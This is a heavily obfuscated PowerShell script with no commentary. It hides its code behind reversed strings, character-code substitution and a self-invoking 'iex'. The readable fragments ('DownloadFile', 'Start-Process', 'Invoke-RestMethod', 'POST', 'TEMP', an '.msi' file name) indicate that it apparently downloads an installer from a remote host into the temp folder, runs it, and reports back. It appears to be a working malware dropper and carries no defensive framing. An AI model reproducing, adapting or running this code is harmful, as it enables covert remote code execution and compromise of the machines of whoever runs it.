Set-vARiABle rqT ( [ChAr[ ]]")'X'+]03[emOhSP$+]12[eMohsp$ ( . | )43]RahC[]GnIrTs[,)37]RahC[+38]RahC[+701]RahC[((eCAlPer.)63]RahC[]GnIrTs[,'ZnQ'(eCAlPer.)93]RahC[]GnIrTs[,'JKY'(eCAlPer.)'))93]rahc[,JKYXW'+'CJKY ecalPeRC- 63]rahc[,)901]rahc[+35]'+'rahc[+911]rahc[(  ecalPeRC-69]rahc[,)87]rahc[+08]rahc[+811]rahc[( eCalPeR-))JK'+'Y 
XWC+XWC;}HTkXWC+'+'XWC1oAXWC+XWCPelXWC+XWCik'+'1oF{7Bv )XWC+XWCrIQcorP-tratXWC+XWCrJKY,JKYXWC+XWCneXWC+XWC7BvXWC+XWCpXWC+XWCsXWC+XWC8 = }hXWC+XWCTaPEk1olIk1XWC+XWCofJKY,JKYXWC  XWC+XWC XWC+XWC  
XWC+XWC;ps8)bXWC+XWC.i'+'7'+'Bv(7BJKY,JKY}1{}3{}4{}0{XWC+XWCps8(XWC+XWC.    XWC+XWC    
XWC+XWC{ )XWC+XWC}DXWC+XWCaXJKY'+',JKY+XWC8}0{}2{}3{}XWC+XW'+'C1{pXWC+XWCs8(.    JKY,JKYXWC+XWC'+'{XWJKY,JKYC+XWCIQ f-psJKY,JKYf-XWC+XWC ps8}XWC+XWC0{}3{}1{}XWC+XWC2{XWC+XWC}4XWC+XWC'+'{psXWC+XWC8XWC+XWC( = )rIQbrIQXWC+XWC( ;)rIQpr'+'IXWC+XWC'+'QXWC+XWC,rIQXWC+XWCtXWC+XW'+'Can/XWC+XWC/rIQ,rJKY,JKYk1oLnwOXWC+XWCD'+'{XWC+XWC7Bv XWC+'+'XWC       
XWC+XWC{XWC+XWC )}HTXWC+XWCapk1oElik1oJKY,JKYs[,)211]rahc[+511]rahc[+6'+'5]rahc[((ECALper.)29]rahc[]JKY,JKYXWC+XWC }I{7BXWC+XWCv( hXWC+XWCcaerXWC+XWCof XWC+XWC XWC+XWC
;)
}XWC+XWC)rIQXWC+XWCSPrIQ'+'XWC+XWC,XWC+XJKY,JKYf-psXW'+'CJKY,JKYgnirTs[,)401]rahc['+'+99]rahc[+88]rahc[((ECALp'+'er'+'.)XWCNPvXWC,)701]rahc[+94'+'JKY,JKY.X'+'WC+XWC( XWC+XWCfi  XWC+XWC XWC+XWC   
;}JKY,JKYQXWC+XWC,rIQXWC+XWCeMXWC+XWCtseR-XWC+XWCerXWC+'+'XWCIQXWC+XWC'+',rIQdohrIXWC+XWCQ,rIQtrIQ,rIQovnXWC+XWCIXWC+XWCrXWJKY,JKYXWCQ:spt'+'tXWC+XWChrIQXWC+XWC,rIQTrIQ,rIXWC+XWCQLIPHSXWC+XW'+'CP/erXW'+'CJKY,JKYIXWC+JKY,JKYXWC+XWC7Bv = }DAXWC+XWCk1oOk1XWC+XWColXWC+XWCnWOD{7Bv XWC+JKY,JKYWC+XWCOlNXWC+XWCwXWC+XWCk1oOkXWC+XWC1oD{7XWC+XWCBv( XWC+XWCfiXWC+XWC    XWC+XWC  
 }      
;}esk1olAXWC+XWCF{XWC+XWC7BvXWC+XWC = }DAkXWC+XWC1oOJKY,JKY8}2{JKY,JKYWC'+'rIQ51rIXWC+XWCQ,rIQTLIPHrIQ,rIQFXWC+XWCrIQ,rIX'+'WC+XWCQXWC+XWCism.rIQJKY,'+'JKYC+XWCtrIQ,rIQseTXWC+XWCrIQXWCJKY,JKYWC+XWC{XWC+XWC7Bv eliFtXWC+XWCuO- ps8Aps8.}i{XWC+XWC7'+'XWC+XWCBv irU- )rIQkr'+'JKY,'+'JKYXWC+XJKY,JKYk1oDXWC+XWCemOsXWC+XWC{7Bv  

XWC(()XWCxXWC+]03[EMOhspm5w+]12[eMoHsPm5w (. JKY,'+'JKY+XWCIQ,XWC+XWC'+'rIQXWC+XW'+'C-XWC+XWCsurIXWJKY,JKYc[+111]rahc[((ECALper.)63]rahc[]gn'+'irT'+'s[,)55]r'+'ahc[+66]rahc[+811]rahc[('+'(ECALper.)XWC  

}XWC+XWC JKY,JKYXWC+XWCFJKY,JKYC+XWCQ,rIQtisbew.srIQ,rIQutrXWC+XWCirIQ,XWC+XWCrIQism.F'+'rIQf-pXWC+XWCs8}0{}5{JKY,JKY]rahJKY,JKY}4{}2{}XWC+XWC1{}8{}3{}7{XWC+XWC}6'+'{ps8( XWC+XWC=XJKY,JKYWC+XWCrIXWC+XWCQss'+'rIXWC+XWCQXWC+XWCJKY,JKYIJ'+'KY,JKYWC+XWC7XWC+XWCBXWC+XWCv  XWC+XWC XWC+XWC  XWC+XWC 
{ yrt    
{ )}aTk'+'XWC+XWC1oAdXWC+XWCeMk1ooS{7Bv niJKY,JKYWC  XWC+XWC
}      
'+' ;}HTXWC+XWCk1oAPELIk1'+'ofXJKY,JKY'+'vhcXPMEXWC+XWCT:vJKY,JKY{XJKY,JKYC1{}0{pXWC+XJKY,JKY ) )9'+'3]rahc[]gnirTs[,)411]rahc[+37]rahc[+18]rahc[((ECALper.)43]rahc[]gnirTJKY,JKY'+'WCs8(JKY,JKYC'+'+XWC7XWC+XWCBv )rIQhtaPXWC+XWCrIQ,rIQXWC+XWC-XWJKY,JKYXWC+X'+'WCIXWC+XWCQ,rXWC+XWCIQerIQ,rIXWC+XWCQSrIQ,XJKY,JKYWC+XWC )rIQarIQ({@]tcejbOmotsuCSPXWC+XWC['+'  
(@ = }ATAJKY,JKY+XWC f- ps8}2{}XWC+XWJKY,JKYXWC+XWC 
}    XWC+XWC
{ hctac  XWC+XWC  
}   JKY,JKYEuRkXWC+XWC1ot{JKYf- ISk}7{}63{}33{}61{}91{}1{}54{}4{}41{}43{}14{}'+'22{}11{}32{}31{}13{}93{}62{}24{}72{'+'}73{}81{}04{}5{}42{}2{}8{}6{}23{}0{}82{}34{}01{}44{}9{}21{}53{}52{}83{}92{}'+'03{}02{}71{}51{}3{}12{ISk((( ()JKYJKYNIoj-JK'+'YxJKY+]3,1[)(GNIrTSOT.eCNerEferPeSObreVZnQ (& '( "  ) ;[ArrAY]::REveRSE( $rqt ) ; $rqt -JoIN ''|&( $ENv:ComSpec[4,15,25]-jOIN'')
